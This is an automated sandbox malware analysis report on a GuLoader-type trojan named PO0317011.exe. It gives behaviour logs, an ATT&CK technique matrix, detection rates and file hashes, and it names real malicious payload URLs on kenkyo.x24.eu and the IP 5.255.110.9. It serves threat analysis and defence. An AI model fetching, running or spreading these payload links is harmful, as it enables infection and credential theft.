Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeCode function: 0_2_00406072 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406072

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		1
Access Token Manipulation		1
Masquerading		OS Credential Dumping211
Security Software Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
PowerShell		Boot or Logon Initialization Scripts311
Process Injection		131
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop Protocol1
Clipboard Data		1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		1
Access Token Manipulation		Security Account Manager131
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets3
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing		Cached Domain Credentials14
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
PO0317011.exe63%VirustotalBrowse
PO0317011.exe53%ReversingLabsWin32.Trojan.Guloader
PO0317011.exe100%AviraTR/Injector.pmbgm

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\resider\actinidiaceae\PO0317011.exe100%AviraTR/Injector.pmbgm
C:\Users\user\AppData\Local\resider\actinidiaceae\PO0317011.exe53%ReversingLabsWin32.Trojan.Guloader

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bin100%Avira URL Cloudmalware
https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.binI#y100%Avira URL Cloudmalware
https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bincS100%Avira URL Cloudmalware
https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bin~RU100%Avira URL Cloudmalware
https://kenkyo.x24.eu/100%Avira URL Cloudmalware
https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.binB#100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
kenkyo.x24.eu
5.255.110.9
truefalse
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.binfalse
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.binI#ymsiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    http://crl.mmsiexec.exe, 0000000B.00000003.2269063976.0000000007D56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2268318114.0000000007D56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2268428595.0000000007D8A000.00000004.00000020.00020000.00000000.sdmpfalse
      		high
      https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bin~RUmsiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      http://nsis.sf.net/NSIS_ErrorErrorPO0317011.exe, PO0317011.exe.1.drfalse
        		high
        https://kenkyo.x24.eu/msiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bincSmsiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.binB#msiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        5.255.110.9
        		kenkyo.x24.euNetherlands
        		60404LITESERVERNLfalse

        General Information

        Joe Sandbox version:42.0.0 Malachite
        Analysis ID:1638437
        Start date and time:2025-03-14 11:56:38 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 52s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:13
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:PO0317011.exe
        Detection:MAL
        Classification:mal100.evad.winEXE@6/21@1/1
        EGA Information:
        • Successful, ratio: 50%
        HCA Information:
        • Successful, ratio: 99%
        • Number of executed functions: 34
        • Number of non-executed functions: 31
        Cookbook Comments:
        • Found application associated with file extension: .exe

        Warnings

        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 23.60.203.209, 20.109.210.53
        • Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target msiexec.exe, PID 7356 because there are no executed function
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        06:57:42API Interceptor37x Sleep call for process: powershell.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        5.255.110.9MG710417.exeGet hashmaliciousAzorultBrowse
          CcaIeCqe6N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            ORDER NO. MT STAR ENERGY RFQ - ATLO-SP033-24.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
              S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                HATCH COVER REQ_AW24 New Order Request.exeGet hashmaliciousGuLoaderBrowse
                  Est_US091024A - PICTURE.exeGet hashmaliciousAzorult, GuLoaderBrowse
                    SwiftMesaj.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                      Unincriminated.exeGet hashmaliciousAzorult, GuLoaderBrowse
                        PO#940894.exeGet hashmaliciousAzorult, GuLoaderBrowse
                          Opgaveforlb.exeGet hashmaliciousAzorult, GuLoaderBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            kenkyo.x24.euMG710417.exeGet hashmaliciousAzorultBrowse
                            • 5.255.110.9
                            CcaIeCqe6N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 5.255.110.9
                            ORDER NO. MT STAR ENERGY RFQ - ATLO-SP033-24.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 5.255.110.9
                            S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                            • 5.255.110.9
                            HATCH COVER REQ_AW24 New Order Request.exeGet hashmaliciousGuLoaderBrowse
                            • 5.255.110.9
                            Est_US091024A - PICTURE.exeGet hashmaliciousAzorult, GuLoaderBrowse
                            • 5.255.110.9
                            SwiftMesaj.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                            • 5.255.110.9
                            Unincriminated.exeGet hashmaliciousAzorult, GuLoaderBrowse
                            • 5.255.110.9
                            PO#940894.exeGet hashmaliciousAzorult, GuLoaderBrowse
                            • 5.255.110.9
                            Opgaveforlb.exeGet hashmaliciousAzorult, GuLoaderBrowse
                            • 5.255.110.9

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            LITESERVERNLMG710417.exeGet hashmaliciousAzorultBrowse
                            • 5.255.110.9
                            CcaIeCqe6N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 5.255.110.9
                            ORDER NO. MT STAR ENERGY RFQ - ATLO-SP033-24.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 5.255.110.9
                            uEhN67huiV.dllGet hashmaliciousUnknownBrowse
                            • 5.255.111.64
                            wkshindemips.elfGet hashmaliciousUnknownBrowse
                            • 5.255.127.202
                            SLNA_Updated_Medical_Grant_Application(1).docxGet hashmaliciousUnknownBrowse
                            • 5.255.125.140
                            SLNA_Updated_Medical_Grant_Application(1).docxGet hashmaliciousUnknownBrowse
                            • 5.255.125.140
                            S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                            • 5.255.110.9
                            https://google.com/amp/s/storage.googleapis.com/49849844877/j0htjd3c57qbxqo95o8y8539efonkjievx55ax9wajxz4bsbs0i-sele6jz88a1rq45sxfmxy9judtbr3v3hrgryrc2p8a.htmlGet hashmaliciousUnknownBrowse
                            • 5.255.99.94
                            XzCRLowRXn.exeGet hashmaliciousUnknownBrowse
                            • 5.255.111.64

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            37f463bf4616ecd445d4a1937da06e19Payment slip_pdf.pif.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 5.255.110.9
                            Portals.exeGet hashmaliciousVidarBrowse
                            • 5.255.110.9
                            Portals.exeGet hashmaliciousUnknownBrowse
                            • 5.255.110.9
                            test.lnk.download.lnkGet hashmaliciousUnknownBrowse
                            • 5.255.110.9
                            file.exeGet hashmaliciousRemcosBrowse
                            • 5.255.110.9
                            DropboxInstaller.exeGet hashmaliciousUnknownBrowse
                            • 5.255.110.9
                            faktura_FV2025020660849.htmlGet hashmaliciousUnknownBrowse
                            • 5.255.110.9
                            ngbtiladkrthgad.exeGet hashmaliciousVidarBrowse
                            • 5.255.110.9
                            Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeGet hashmaliciousGuLoader, RemcosBrowse
                            • 5.255.110.9
                            NDQ211216GM08.exe.bin.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 5.255.110.9

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:modified
                            Size (bytes):53158
                            Entropy (8bit):5.062687652912555
                            Encrypted:false
                            SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                            MD5:5D430F1344CE89737902AEC47C61C930
                            SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                            SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                            SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j0f24b5w.0hk.ps1

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
